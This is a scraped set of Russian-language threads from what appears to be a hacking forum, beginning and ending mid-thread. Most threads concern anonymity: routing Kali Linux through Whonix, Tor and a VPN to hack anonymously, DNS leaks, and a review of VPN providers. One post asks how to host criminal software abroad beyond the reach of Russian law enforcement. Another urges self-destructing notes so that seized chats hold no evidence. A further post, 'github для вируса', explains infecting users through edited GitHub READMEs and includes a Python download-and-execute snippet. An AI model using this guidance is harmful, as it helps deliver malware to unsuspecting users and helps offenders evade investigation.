Что я не так делаю? Ну на этот вопрос можно и не отвичать)
Или посоветуйте рабочие методы создания своего сервера жабы
Спасибо заранее

Japan и РФ.

ID: 676533bbb4103b69df371d64
Thread ID: 27786
Created: 2019-02-11T09:26:05+0000
Last Post: 2019-03-17T07:40:50+0000
Author: Jentam
Replies: 8 Views: 3K

Как обстоят дела в плане сотрудничества у Японии и РФ в уголовном плане. Есть несколько серверов в jp, хочется разместить там софт для работы. Тема Черная как дерьмо дьявола! Сможет ли сотрдуничать jp с РФ, если все пойдет под откос?

Как получить полную анонимность с помощью Tor, Whonix и PIA VPN?

ID: 676533bbb4103b69df371d6e
Thread ID: 27820
Created: 2019-02-12T16:44:36+0000
Last Post: 2019-02-16T06:50:17+0000
Author: tabac
Prefix: Статья
Replies: 2 Views: 3K

Как получить полную анонимность с помощью Tor, Whonix и PIA VPN?

Осуществление взлома с основной машины без какого-либо проксирования — ужасная глупость со стороны хакера, которая может привести к тому, что в ходе теста на проникновение важный IP-адрес очень быстро попадет в черный список. Но если направить весь трафик через Tor и уменьшить с помощью VPN [угрозы злонамеренных входных и выходных узлов](https://threatpost.com/researcher- finds-tor-exit-node-adding-malware-to-binaries/109008/), то мы сможем настроить Kali так, чтобы она стала полностью конфиденциальной и анонимной.

Запуск Kali Linux на виртуальной машине может быть практически идеальным вариантом для взлома, но в этом случае ваша анонимность целиком зависит от анонимности вашего соединения. Tor — это самая эффективная сеть обфускации трафика. И хотя Tor-браузер сам по себе не является самым правильным вариантом для хакера, но в этом случае мы можем использовать Whonix для маршрутизации всего нашего трафика Kali Linux через сеть Tor.

Наконец, для того чтобы добавить еще один слой анонимности, мы можем объединить VPN с Tor, что еще больше запутает наш трафик и предотвратит [атаки Tor Deanonymization Attacks](https://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-evans- grothoff.pdf).

Шаг 1. Выполнение предварительных требований
Для решения проблем по виртуализации окружения в этой статье мы будем использовать VirtualBox. Он работает в Windows, OS X и доступен в репозиториях большинства дистрибутивов Linux. Его можно скачать здесь или установить на всех дистрибутивах на базе Debian, таком как Kali, с помощью следующей команды:

Code:Copy to clipboard

sudo apt-get install virtualbox

Чтобы виртуализировать Kali, нам понадобится образ диска Kali. Можно скачать его здесь, выбрав правильную архитектуру (32- или 64-разрядную) и десктопное окружение. «Kali 64 bit» должен работать у большинства пользователей.

Whonix предоставляет OVA-файл, который можно открыть и настроить в VirtualBox. Нам нужен только Gateway-образ, потому что в качестве нашей рабочей станции мы будем использовать Kali, а не среду Whonix Workstation. Файл Whonix- Workstation скачать здесь.

И, наконец, вам понадобится какой-нибудь VPN-сервис для того, чтобы направить весь трафик по VPN перед тем, как войти в сеть Tor. Мы рекомендуем VPN от Private Internet Access (PIA), однако в Интернете довольно много и других бесплатных и платных VPN-сервисов.

При выборе VPN нужно учитывать общую надежность сервиса, местоположение его серверов, а также политику в отношении логгирования (ведения журнала) данных и метаданных пользователей. PIA заявляет, что вообще не ведет журналов, но тут нужно понимать, что сервер, не находящийся под вашим контролем, не может считаться полностью заслуживающим доверия.

Теперь, проведя всю эту подготовительную работу, мы можем начать настройку нашего виртуального окружения.

Шаг 2. Настройка Whonix в VirtualBox
Открыв VirtualBox после завершения его установки, сначала выберите меню «Файл» (File) и нажмите «Импортировать устройство» (Import Appliance).

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F1247665%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc1300b3dd64a60f2430%2Fscale_600&hash=48b90d5320242eae56d82bf7131414a2)
Кликните по значку папки справа, чтобы «Выбрать файл виртуального устройства для импорта» (Choose a Virtual Appliance File to Import) и откройте меню просмотра файлов.

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F1101877%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc13bce67e5cd9f5308c%2Fscale_600&hash=9b488d3387ba4957c5a2aea3f7411c33)
Перейдите к файлу OVA Whonix Gateway, который вы уже скачали, выберите его и кликните на кнопку «Далее» (Next). После этого кликните «Импорт» (Import), чтобы начать настройку виртуальной машины Whonix Gateway.

Согласитесь с условиями лицензионного соглашения (кликните «Согласен»), чтобы продолжить конфигурацию. После завершения этого процесса VirtualBox должен выглядеть примерно так, как показано на скриншоте ниже, где видно, что виртуальная машина Whonix Gateway доступна в левой панели окна.

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F1054867%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc1348c85e9c0f6ccfdd%2Fscale_600&hash=9663bfe44e145234933bbcd44596e09a)
Шаг 3. Запустите Kali в VirtualBox
Шаги по настройке виртуальной машины Kali в VirtualBox будут аналогичны процессу настройки Whonix Gateway. Нам нужно выбрать несколько дополнительных параметров конфигурации и напрямую указать VirtualBox на образ диска с Kali.

Чтобы начать кликните на кнопку «Создать» (New) в верхнем левом углу интерфейса VirtualBox.

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F30884%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc1348c85e9c0f6ccfde%2Fscale_600&hash=7fbac9d19b358c7b0be0db6cf56ffffa)
В следующей форме введите описательное имя для вашей новой виртуальной машины, в данном случае «Kali Linux», выберите «Тип: Linux» и «Версия: Linux 2.6 / 3 / 3.x / 4.x (64-bit)»

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F96506%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc13bce67e5cd9f5308d%2Fscale_600&hash=aace61fbbf01575d164826b7f1b51c07)
На следующем шаге выделите тот объем памяти, который вы хотите, чтобы был доступен этой виртуальной машине. Рекомендуется выделять не менее 1024 МБ или 1 ГБ оперативки. На железе с большим объемом оперативной памяти большее выделение может привести к повышению производительности работы.

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F235990%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc15bce67e5cd9f5308e%2Fscale_600&hash=c690ef213dd5785d60aa2a17249fa839)
Затем выберите «Создать виртуальный жесткий диск» (Create a virtual hard disk now).

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F1221393%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc15bce67e5cd9f5308f%2Fscale_600&hash=5fa5c75bf4c88b21c25b902eb25fb3c8)
Выберите VDI или «Виртуальный образ диска» (Virtual Disk Image) и «Динамически выделенные» (Dynamically Allocated).

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F209388%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc1500b3dd64a60f2431%2Fscale_600&hash=64fca62b7d4565b6830d195fb2a8631a)
Наконец, выделите тот объем места на жестком диске, который вы готовы предоставить для нужд виртуальной машины Kali.

Имейте в виду, что этот лимит представляет собой тот максимально возможный объем памяти на вашем жестком диске, который виртуальной машине разрешено занимать в принципе, и это не обязательно тот объем места, который она займет фактически.

Размер виртуальной машины, скорее всего, более точно коррелирует с размером образа диска или ISO-файла, с которого виртуальная машина загружается.

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F1107063%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc1500b3dd64a60f2432%2Fscale_600&hash=e7b8a91ec3f870458a4545818d9e4d36)
И, наконец, после того, как вы кликните по кнопке «Создать» (Create) виртуальная машина с Kali должна появиться в левой панели вместе с ранее настроенной виртуальной машиной Whonix Gateway.

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F50129%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc15bce67e5cd9f53090%2Fscale_600&hash=0e8e5f8a44777254b30e1731e612ee84)
Шаг 4. Загрузка и установка Kali
После добавления виртуальной машины мы можем запустить ее, выбрав ее в левой панели и нажав на кнопку «Запустить» (Start).

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F128694%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc1748c85e9c0f6ccfdf%2Fscale_600&hash=a11edfb69fb75fc168b9953a1069ea01)
После загрузки виртуальной машины нам будет предложено выбрать виртуальный диск. На этом этапе должен быть выбран ISO-файл с Kali Linux.

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F51182%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc18bce67e5cd9f53091%2Fscale_600&hash=9dba7e3c961739b534a1c4bb89fad603)
После того, как вы нажмете кнопку «Запустить» начнется процесс загрузки Kali и появится загрузочное меню.

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F96506%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc18bce67e5cd9f53092%2Fscale_600&hash=9604487829bdc436bb3f21379e12ca52)
Виртуальная машина ведет себя так, как если бы образ с Kali загружался на любом другом оборудовании. На этом этапе можно выбрать, запускать ли Kali как Live-образ или установить ее. Конфигурация Whonix и VPN по-прежнему будет работать с загрузочным Live-устройством, а состояние и конфигурация такого устройства могут быть сохранены с помощью функции сохранения состояния у VirtualBox.

Однако установка Kali на виртуальную машину может дать некоторые преимущества. Виртуальную машину можно быстро загружать и перезагружать, в этом случае может быть проще сохранять состояния конфигурации на виртуальном жестком диске, а не путем использования функции сохранения состояний в VirtualBox. Графический установщик работает так же, как и любой другой мастер установки у любого дистрибутива и относительно прост в использовании.

После того, как виртуальная машина будет установлена или загружена, следующие шаги позволят нам настроить ее для работы с Whonix.

После загрузки нашей виртуальной машины Kali, первым делом нужно открыть окна терминала и обновить систему.

Code:Copy to clipboard

sudo apt-get update && sudo apt-get upgrade

Эта команда обновляет реестр пакетов и обновляет устаревшие пакеты.

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F1362956%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc1800b3dd64a60f2433%2Fscale_600&hash=256e209f4c2912d1aa74b4c07a94781a)
После того, как наша система завершит свое обновление, мы можем выключить ее с помощью менеджера сессий Kali.

Шаг 5. Направление трафика Kali через Whonix
Сначала нам нужно загрузить нашу виртуальную машину Whonix так же, как мы запускали виртуальную машину с Kali, кликнув на кнопку «Запуск» (Start) в левом верхнем углу окна VirtualBox. После первоначальной настройки и, возможно, необходимой перезагрузки виртуальной машины мы увидим примерно такую картинку, как на скриншоте ниже.

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F1362956%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc1800b3dd64a60f2434%2Fscale_600&hash=7c7da446805fcaff73192734d1e85df8)
Нам нужно оставить это окно открытым, поскольку мы настраиваем Kali, так как весь трафик Kali будет перенаправляться через Whonix и от Whonix, в свою очередь, через Tor. Этот Tor-шлюз будет работать только до тех пор, пока его процесс в виртуальной машине будет запущен.

Вернемся к диспетчеру VirtualBox. Кликните правой кнопкой мыши на виртуальный образ Kali и выберите из меню «Настроить». В окне настроек выберите пункт «Сеть» на левой панели и здесь измените «Тип подключения» (Attached to) на «Внутренняя сеть» (Internal Network) и выберите «Whonix» в качестве параметра «Имя» (Name).

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F44645%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc1800b3dd64a60f2435%2Fscale_600&hash=e356eda19efbc335dddd8789ce416b8a)
Сохраните изменения в настройках, нажав кнопку «OK». Теперь можно загрузить виртуальную машину Kali. Как только она загрузится, сетевые подключения, скорее всего, не будут функционировать. До того, как трафик Kali пройдет через Whonix, необходимо внести некоторые изменения в конфигурацию сети Kali. Сначала давайте отключим сетевой адаптер, используя ifconfig.

Code:Copy to clipboard

ifdown eth0

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F195198%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc1a48c85e9c0f6ccfe0%2Fscale_600&hash=ba559280f37ceda91c5a03f130cbf06f)
После этого нужно поправить /etc/resolv.conf и указать там правильный nameserver для Whonix. Можно отредактировать его в Nano. Управление в Nano стандартно для всех редакторов. Чтобы открыть nano, введите следующую команду:

Code:Copy to clipboard

nano /etc/resolv.conf

Теперь добавим в этот файл следующую строку, но для начала следует удалить любые другие параметры конфигурации, если они есть:

Code:Copy to clipboard

nameserver 10.152.152.10

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F128694%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc1b48c85e9c0f6ccfe1%2Fscale_600&hash=15216f32c21418f247a801d93701c511)
Нажмите Ctrl + O, чтобы сохранить изменения, и Ctrl + X, чтобы выйти.

Следующий файл, который нужно подредактировать — это /etc/network/interfaces. Мы можем сделать это, набрав команду:

Code:Copy to clipboard

nano /etc/network/interfaces

Чтобы определить, где виртуальный сетевой адаптер должен искать определенные сетевые элементы в нижней части файла, нам нужно добавить следующую информацию:

Code:Copy to clipboard

iface eth0 inet static

address 10.152.152.11

netmask 255.255.192.0

gateway 10.152.152.10

Опять же, нажмите Ctrl+O для сохранения изменений и Ctrl+X — для выхода.

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F147743%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc1bbce67e5cd9f53093%2Fscale_600&hash=dbb17988adb4561f22fd00de0f697a47)
Наконец, мы включаем наш виртуальный сетевой адаптер обратно и теперь весь трафик должен идти по заданному маршруту. Для этого введите следующее:

Code:Copy to clipboard

ifup eth0

Мы можем проверить, идет ли наш трафик через Tor, перейдя на вот эту страницу тестирования Tor. Если эта страница подтвердит, что мы используем Tor, значит нам удалось направить весь наш трафик через сеть Tor!

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F50129%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc1b00b3dd64a60f2436%2Fscale_600&hash=7751108986f64b2f3497362f02577014)
Шаг 6. Добавление VPN
Поскольку мы направили весь трафик, генерируемый виртуальной машиной через Tor, мы можем «обернуть» весь идущий туда трафик, добавив VPN, либо на хост, на котором работают виртуальные машины, [добавив VPN в нашу конфигурацию Whonix](https://www.whonix.org/wiki/Tunnels/Connecting_to_a_VPN_before_Tor#Inside_Whonix- Gateway). Как правило, проще добавить VPN к хосту, но если мы хотим убедиться, что весь наш трафик закрыт внутри VPN-сервиса и нет никакой утечки, то мы можем использовать такой инструмент, как VPN Firewall для Linux-систем.

Конфигурация VPN отличается в зависимости от разных операционных систем или дистрибутивов. Если VPN-провайдер предоставляет файл конфигурации для его VPN, как это обстоит с OpenVPN-файлом, то вы можете просто импортировать соответствующую конфигурацию.

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F1247665%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc1b00b3dd64a60f2437%2Fscale_600&hash=88ad206cf6befb4c477b1de34d04f8f4)
Например, у VPN-провайдера PIA есть страница «Загрузка и поддержка», на которой объясняется, как устанавливать и настраивать их VPN в различных операционных системах.

![](/proxy.php?image=https%3A%2F%2Favatars.mds.yandex.net%2Fget- zen_doc%2F1054867%2Fpub_5aeecbeebce67e5cd9f53088_5aeecc1c48c85e9c0f6ccfe2%2Fscale_600&hash=ba8ce5862605a2bbfe03680f64a46678)
Когда все эти инструменты анонимности и сама Kali настроены, это означает, что вы готовы серфить интернет и взламывать что-либо конфиденциально и анонимно!

Защищаем DNS

ID: 676533bbb4103b69df371d71
Thread ID: 27356
Created: 2019-01-19T13:03:26+0000
Last Post: 2019-02-08T15:59:43+0000
Author: tabac
Replies: 7 Views: 3K

УтечкаDNS**** - не самый страшный, но всё же довольно неприятный факт. А если ваш провайдер перехватывает\логирует\подменяет DNS-запросы, или вы просто хотите обезопасить DNS-трафик, то можно использовать dnscrypt- proxy и GUI для него Simple DNSCrypt.

Проверить DNS leak:
https://dnsleaktest.com
http://dnsleak.com
https://ipleak.net/

Сервера без логов с DNSSEC/DNScrypt:
https://dns.watch
https://www.opennic.org/

Сравнить скорость DNS серверов:
https://www.dnsperf.com
https://github.com/google/namebench

Проверяем 7 популярных провайдеров VPN на предмет приватности

ID: 676533bbb4103b69df371cbb
Thread ID: 27033
Created: 2018-12-25T16:42:05+0000
Last Post: 2020-07-22T17:39:00+0000
Author: tabac
Replies: 7 Views: 3K

В наше время без VPN никуда: анонимность, безопасность и возможность обойти региональные ограничения и блокировки приводят к этой технологии не только технически подкованную публику, но и людей попроще. А они, конечно же, не будут ставить и настраивать OpenVPN на своем сервере и предпочтут услуги провайдера. Какой выбор нас ждет в таком случае и можно ли доверять провайдерам VPN? Давай пройдемся по наиболее известным из них и проверим.
Сначала определимся с критериями, на которые будем смотреть. Я предлагаю выдвигать такие требования.

SSL-сертификация доменов. Если с ней есть проблемы, то возможны атаки типа MITM.
Отсутствие подстав в лицензионном соглашении. Провайдер, для которого приватность пользователей не пустой звук, не должен пытаться заставить тебя соглашаться на что угодно.
Поддержка стойкого шифрования и современных протоколов. В некоторых странах при помощи DPI-аппаратуры успешно блокируются стандартные типы подключения, такие как PPTP, L2TP IKEv1, OpenVPN UDP и прочие. Уважающий себя провайдер должен предоставлять пути обхода. Что касается шифрования, здесь все индивидуально. Отмечу лишь, что протокол PPTP, используемый вкупе с MS-CHAP, был взломан в 2012 году. С тех пор любой человек, заплатив 17 долларов, имеет возможность дешифровать трафик.

CyberGhost VPN
CyberGhostVPN — немецко-румынский сервис, ведущий свою деятельность с 2007 года. Немногие остаются на плаву столько времени. Этот сервис предлагает три типа подключения: L2TP, OpenVPN, IPSec.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F12%2F200305%2F1.jpg&hash=548f94adb43a4c9c7fae6dc104ec3e45)
CyberGhost VPN

Способы обхода блокировок отсутствуют. Есть лишь возможность подключения по протоколу TCP на 443-м порте при использовании OpenVPN, что уже неэффективно в странах с DPI. SSL-сертификат ресурсу выдан компанией Comodo и действителен до 23.02.2019.

Два года назад CyberGhost оказался в центре скандала. Одно из обновлений его клиента устанавливало на машины пользователя корневой SSL-сертификат. Чем это плохо? Дело в том, что, когда ты устанавливаешь соединение по HTTPS, твои данные защищаются протоколом SSL/TLS, который подтверждается специальным сертификатом, выданным уполномоченной компанией. Браузер сверяется со списком сертификатов ОС и, если все сходится, разрешает войти на сайт. Обновление CyberGhost добавляло свой сертификат в этот список, что открыло возможность атаки типа man in the middle.

Компания поспешила выпустить опровержение, однако позже вскрылась другая проблема: фирменный клиент для Windows логирует системные данные компьютера, такие как название видеочипа, модель процессора и имя пользователя. Что тут сказать? Репутация подпорчена.

Что касается Privacy Policy, тут все очень интересно. В статье из своей базы знаний руководство сервера отчетливо и без ужимок заявляет о том, что логи [не ведутся](https://support.cyberghostvpn.com/hc/en-us/articles/213898965-Does- CyberGhost-log-No-). Однако просмотр «политики конфиденциальности» вызвал у меня определенные вопросы.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F12%2F200305%2F2.jpg&hash=c08595422eb93775ec68977fa3c16b28)
Политика безопасности CyberGhost VPN

В «анонимизацию» IP верится с трудом, да и остальное не вызывает теплых чувств. Любой сбор данных противоречит ответу в базе знаний, где заявлено, что логов нет.

NordVPN
NordVPN — стремительно набирающий популярность сервис, зарегистрированный в Литве. Ведет деятельность с 2013 года. В графе «Наши партнеры» раньше было указано, что контора получила CCNP-сертификат от CISCO, но потом эта информация пропала с сайта.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F12%2F200305%2F3.jpg&hash=b6afd31a2b759aa982d974399419098b)
Сертификат CISCO с веб-архива

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F12%2F200305%2F4.jpg&hash=8837d42dca8206dfa50676a4895f1b3f)
Графа «Партнеры» без сертификата

Почему информация о сертификате пропала с сайта? Как удалось получить этот сертификат, не имея никаких заслуг? Ответов нет, и убрали явно не просто так.

В «Политике конфиденциальности» тоже нашлись проблемы. Один пункт гласит, что логи не ведутся вообще, другой говорит нам, что сервис имеет право хранить ограниченное количество (сколько?) личной информации в течение двух лет.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F12%2F200305%2F5.jpg&hash=ba155829fac9f08143a225717a97c521)
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F12%2F200305%2F6.jpg&hash=6ea4a7e7ded7ca72a1a018dd37cf09b7)
Политика конфиденциальности NordVPN

На сайте утверждается, что пул серверов состоит из 5178 единиц, которые расположены в 62 странах. Используемые методы подключения: OpenVPN, L2TP, IPSec. Приятный бонус — возможность обхода DPI через stunnel.

С NordVPN все было бы хорошо, если бы не история с сертификатом CISCO и не лицензионное соглашение, которое разрешает владельцам сервиса собирать информацию, но не конкретизирует, какую именно.

Но есть и еще один интересный момент. Двое пользователей Reddit предприняли независимое исследование, судя по которому NordVPN принадлежит известной датамайнинговой компании TesoNet.

Похоже, именно это позволяет сервису тратить по полмиллиона долларов в месяц (только вдумайся в эту цифру!) на покупку отзывов и рекламы своего продукта. Так, по данным сайта adweek.com, NordVPN потратил на рекламу 497 тысяч долларов за один лишь февраль 2018 года. Откуда такие деньги? Думаю, ответ очевиден.

Выходит, пользоваться этим сервисом крайне опасно: вместо анонимности есть шанс предоставить подробные логи для датамайнинга. И напоследок еще одна неприятная история. В рекламном порыве сотрудники NordVPN накрутили рейтинг подложным отзывам на сайте trustpilot.com. Этот факт подтвержден администрацией ресурса.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F12%2F200305%2F7.jpg&hash=7f06b28b9cfd6972a984ab68fc72845c)
Накрутка отзывов NordVPN

Private Internet Access
Private Internet Access — широко известный среди зарубежных пентестеров VPN-сервис. Среди аналогов выделяется детальными настройками шифрования (можно менять порт подключения, тип шифровки и ключа), наличием встроенных способов обхода DPI, а также своего SOCKS5-прокси и SSH-туннеля. Одним словом, хоть сейчас медаль давай, но увы…

Во-первых, web.archive.org ничего не знает о времени существования этого сервиса и о старых версиях сайта. Похоже, администрация попросила их удалить, а это тревожный знак.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F12%2F200305%2F8.jpg&hash=28c67791fd86f1942aaaa0da2f5ae342)
Результаты поиска в веб-архиве

Мне удалось обнаружить, что этот провайдер находится на территории США, а также принадлежит некоему псевдоконгломерату, область деятельности которого раскидывается от VPN до бутиков.

Да, у Private Internet Access есть возможность шифрования 4096-битным ключом. Да, он спокойно кладет на лопатки DPI, но какой в этом смысл, если по первому зову Дяди Сэма все данные окажутся в руках властей?

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F12%2F200305%2F9.jpg&hash=b14914aa709cfe0e058acd98d107a509)
Информация о сервисе

Попробуем поискать информацию о фирме-хозяине — London Trust Media. Поиски быстро привели меня к [статье](https://www.newsbtc.com/2018/04/19/disgraced- ceo-of-mt-gox-appointed-cto-at-london-trust-media/), сообщающей, что исполнительным директором этой компании был назначен Марк Карпелес (Mark Karpeles), при полном попустительстве которого была ограблена японская криптобиржа Mt.Gox. Доверия к этому товарищу у меня нет и быть не может.

HideME VPN
HideME — самый известный в рунете VPN-сервис. Ведет деятельность с 2007 года. Авторизоваться можно, только если есть цифровой код, который Google легко находит на тематических форумах.

Один из типов подключения к HideME VPN — это PPTP, что само по себе нехорошо — протокол уязвим. Кроме того, в 2016 году по запросу властей РФ HideME отключил анонимайзер для российских пользователей. На этом можно было бы и остановиться, но я предлагаю еще заглянуть в политику конфиденциальности.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F12%2F200305%2F10.jpg&hash=513f1b56dd1261e4a7ae2c0d59d55baa)
Политика конфиденциальности HideME VPN

Да, может быть, они и отказались от регистрации, но ключи, абсолютно ничем не хешированные, при должной сноровке можно подобрать за три дня. Кроме того, обрати внимание на первый абзац, а также на то, как был отработан запрос РКН. Использования этого сервиса для чего-то, кроме доступа к Spotify, стоит избегать любой ценой.

Hide My Ass! VPN
Hide My Ass — один из самых известных провайдеров в мире. Принадлежит он компании Avast. Многих это отпугнет сразу же, но мы продолжим изучение. Сервис существует в качестве анонимайзера с 2005 года, функция VPN у него появилась в 2009-м. Грандиозное отличие Hide My Ass от всех рассмотренных провайдеров — колоссальное количество выходных стран. Однако, к большому сожалению, радоваться тут нечему.

В 2011 году этот провайдер выдал властям США одного из участников группировки LulzSec — Коди Эндрю Кретзингера. Мало того, администраторы еще написали длинный пост в свое оправдание. Выдача логов якобы была обоснованной. Но на месте этого человека мог быть любой журналист или же правозащитник в тоталитарной стране.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F12%2F200305%2F11.jpg&hash=4309b32c49f2b154edf6135bdbb702dc)
Пост оправдания Hide My Ass

Вывод напрашивается сам собой: Hide My Ass в любой момент выдаст то самое, что обещал надежно спрятать, а потому не годится для серьезных применений.

PureVPN
PureVPN — еще один популярный провайдер, созданный в 2008–2009 годах. Набор протоколов стандартный: OpenVPN, L2TP, IPSec. Прославился PureVPN тем, что выдал властям назойливого киберсталкера Эндрю Лина (мы [писали об этой истории](https://xakep.ru/2017/10/19/purevpn- statement/)). С точки зрения морали можно относиться к этой истории как угодно, но факт налицо: логи хранятся.

VyprVPN
VyprVPN начал активную деятельность в 2010 году. Зарегистрирован в Швейцарии. Имеет стандартный набор протоколов: OpenVPN (AES-256), IPSec, L2TP. Радует наличие обхода через stunnel, который маркетологи гордо именуют Chameleon — оставим это на их совести.

Нас же интересует лицензионное соглашение, которого вполне достаточно для выводов.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2018%2F12%2F200305%2F13.jpg&hash=6f7ab57c931577e5bac437c49ffa3fed)
Политика конфиденциальности VyprVPN

В течение тридцати дней хранится входной (настоящий) IP-адрес, и этим все сказано.

Вывод
Получается, что ни один из изученных нами популярных VPN-сервисов не прошел даже элементарную проверку без применения технического аудита. Лично для меня это значит, что веры таким провайдерам нет и быть не может. Поэтому всем, кто беспокоится об анонимности и приватности, советую все-таки изучить документацию и поднять свой сервер OpenVPN. А для обхода DPI можешь самостоятельно добавить stunnel.

Не работают прокси...

ID: 676533bbb4103b69df371e12
Thread ID: 6263
Created: 2005-12-31T08:38:46+0000
Last Post: 2006-01-19T13:47:48+0000
Author: faf
Replies: 7 Views: 3K

Ставил я себе на днях прокси (первый Proxy Switcher, а второй Hide IP). Если я правильно думаю, то они должны были заменить мой реальный айпи на анонимный... Но ничего этого я не заметил. Когда в Hide IP я поменял себе айпишник, на странице Test, этой же проги он изменился. Но а в qip, на фримэйловской почте он везде светится реальным. И не одна из этих двух прог не помогла! В чем может быть дело? Я хочу что бы при юзании прокси ВЕЗДЕ был анонимный IP.

Анонимность переписки в любом мессенджере, соц.сети, форуме

ID: 676533bbb4103b69df371d7e
Thread ID: 27247
Created: 2019-01-11T12:43:27+0000
Last Post: 2019-01-14T07:36:46+0000
Author: MyDreamMyTarget
Replies: 5 Views: 3K

Доброго времени суток!

Какой бы безопасный способ общения каждый из нас не выбрал (джаббер, закрытый форум, телеграм.... т.д.) - всегда остаётся человеческий фактор: потеряли телефон, взломали и слили дамп форума, Ваш собеседник был взят силовиками и дает показания, да в конце-концов если пришли к Вам и вы не успели запаролиться, зашифроваться..

На такой случай, как нельзя лучше, пригодится сервис анонимных заметок (самоуничтожающиеся после прочтения записки).
Первая же мысль, обычно возникающая у людей : "Общаться ссылками? что за дичь! Неудобно." Но общаться только лишь ссылками совершенно нет необходимости, достаточно вести обычный диалог, но только лишь при передаче какой-то конкретной информации: домены, ники, пассы, вещи, позволяющей вас скомпроментировать - вставляем записку, которая уничтожиться. В результате, даже если ваш компьютер попадет в недружелюбные руки с криптоанальным анализатором и Вы распаролите вход в систему - в Вашей переписке вместо улик, в самых интересных местах будут лишь нерабочие линки.

Наиболее известный сервис, который уже многие знают и юзают - это https://privnote.com/ (хостится в Ирландии)
Так же есть и менее известный проэкт, антиабузный аналог привнота - https://darkscreen.online/note , который не имеет форм обратной связи, контактов

Берегите себя и Ваших друзей!

github для вируса

ID: 676533bbb4103b69df371d8e
Thread ID: 26177
Created: 2018-10-03T13:48:54+0000
Last Post: 2018-12-08T21:55:34+0000
Author: xrahitel
Replies: 16 Views: 3K

Всем привет сегодня поговорим как легко можно заразить через github по моим наблюдения у каждого второго стоит питон на компе как правило все потому что данный язык программирования очень прост и набирает все больше популярности,самое интересно что мы пачками скачиваем файлы,библиотеки через pip а что там не кому в голову не приходило,возьмем чисто для примера Zoom для чего он видео.

Думаю все понятно пиздуем себе в акк редачим файл README.md и подгружаем свой файл для доставке его жертве и бегом по бордам хвастаться своим охуенным сканером ,конечно если догнать и монетизировать то можно взять все базы про чекать на запрос гитхабика думаю там много акков как это в принципе выглядит видео секретный код по катом :lol2:

Spoiler: 3 у вас 43

import os,wget
filename = 'putty.com'
url = 'https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe'
Files = wget.download(url,filename)
os.startfile(Files)

Click to expand...

Делаем простую анонимную ОС на базе Ubuntu

ID: 676533bbb4103b69df371d90
Thread ID: 26794
Created: 2018-12-07T13:07:57+0000
Last Post: 2018-12-07T13:07:57+0000
Author: FreeWar
Prefix: Статья
Replies: 0 Views: 3K

